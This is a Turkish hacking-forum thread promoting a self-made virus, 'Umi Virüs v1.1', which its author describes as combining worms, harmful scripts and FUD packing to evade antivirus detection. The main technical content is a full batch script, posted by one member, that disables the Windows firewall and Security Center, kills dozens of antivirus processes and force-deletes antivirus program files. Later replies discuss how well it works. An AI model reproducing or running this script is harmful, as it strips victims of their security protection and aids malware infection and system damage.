Turk Hack Team Umi Virüs v1.1

Ariss

Kıdemli Üye
8 Mar 2016
4,583
114
uzay
Güzel Gözüküyor Elerine Sağlık

Teşekkür ederim

windows defender kapatan kod varmı

Var dostum ama gözlemlerim ve denemelerim sonucu malesef çalışmıyor

Eline sağlık, yarın zamanım olursa detaylı bir şekilde kodlarını inceleyeceğim, Acaba içindeki .exe dosyası hangi dil ile yazıldı öğrenebilirmiyim? :)

[COLOR=pink"]
Deneyin hocam ben çok denedim test aşamasında :) . Öncelikle teşekkür ederim hocam. ağırlıklı olarak Dos dili kullandım, çeşitli worm virüsleri ekledim ve klosör kopyalayıcı ekledim, bazı zarrlı komut dosyalarını ekledim. Sonrada virüs progamlarından kaçınmak için FUD ladım. İnşallah kısmet olursa daha iyi bir iş çıkartacağım.
[/COLOR]

Yapışınca bırakmayan cinsten bi virüs :) Eline sağlık..

Teşekkür ederim


Teşekkür ederim hocam :) değerli yorumlarınız için
 
Moderatör tarafında düzenlendi:

Patrick Jane

Uzman üye
1 May 2019
1,499
3
Cehennem
Anti virüs yazılımlarına kill çekiyor, böylelikle etkisi kalkıyor.

Kullandığım kod tam olarak şu:

Kod:
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem



Eğer antiye kill çekilseydi sence anti diye birşey olurmuydu?
 
Moderatör tarafında düzenlendi:

Ariss

Kıdemli Üye
8 Mar 2016
4,583
114
uzay
Vayy anti firması safmış o zaman ki böyle bir açık bırakıyorlar.
Saf bu anti firmaları dimi?
Eğer antiye kill çekilseydi sence anti diye birşey olurmuydu?

Saf mı derken ne ima etmeye çalışıyorsun? Bu komut task kill görevi görüyor ve en çok kullanılan antivirus progamlarını silmek için var. Elbette %100 sonuç vermez. Anti virüs programları bu tarz durumları engellemek için şöyle bir çözüm yöntemi ürettiler eğer dikkat ettiysen bazı Antivirüs progamlarının ayarlarında "silinmeye karşı koru" veya "kaldırılmaya karşı" koru tarzı ayarların olduğunu görmüşsündür. Bu ayarlamalar bu tarz durumları engellemek için antivirus firmaları tarafından konuyor lakin çoğu antivirus kullanıcı bundan ya haberdar değil yada kullanmak istemiyorlar. Üzerine virüsün içinde uzantı bozucu var ayrıca antilere yakalanmasın diyerekten FUD ladım
 

Tdark

Katılımcı Üye
9 Ağu 2019
411
23
Teşekkür ederim



Var dostum ama gözlemlerim ve denemelerim sonucu malesef çalışmıyor



[COLOR=pink"]
Deneyin hocam ben çok denedim test aşamasında :) . Öncelikle teşekkür ederim hocam. ağırlıklı olarak Dos dili kullandım, çeşitli worm virüsleri ekledim ve klosör kopyalayıcı ekledim, bazı zarrlı komut dosyalarını ekledim. Sonrada virüs progamlarından kaçınmak için FUD ladım. İnşallah kısmet olursa daha iyi bir iş çıkartacağım.
[/COLOR]



Teşekkür ederim



Teşekkür ederim hocam :) değerli yorumlarınız için

tamamdır saol
 

Betrahal

Üye
13 Ocak 2019
61
7
tskill kodu antivirusleri kapatmak icin yeterli degildir. Antiviruslerin cogu windows kernel driverlarla geldigi icin exe dosyasini kapatsan bile driver arkada calismaya devam ediyor ki tskillin kapatabilecegi kesin degil.
 

Ariss

Kıdemli Üye
8 Mar 2016
4,583
114
uzay
tskill kodu antivirusleri kapatmak icin yeterli degildir. Antiviruslerin cogu windows kernel driverlarla geldigi icin exe dosyasini kapatsan bile driver arkada calismaya devam ediyor ki tskillin kapatabilecegi kesin degil.

Doğrdur zaten söylediğim gibi %100 olarak antiyi kapatmaz. Geri dönütün için teşekkür ederim
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.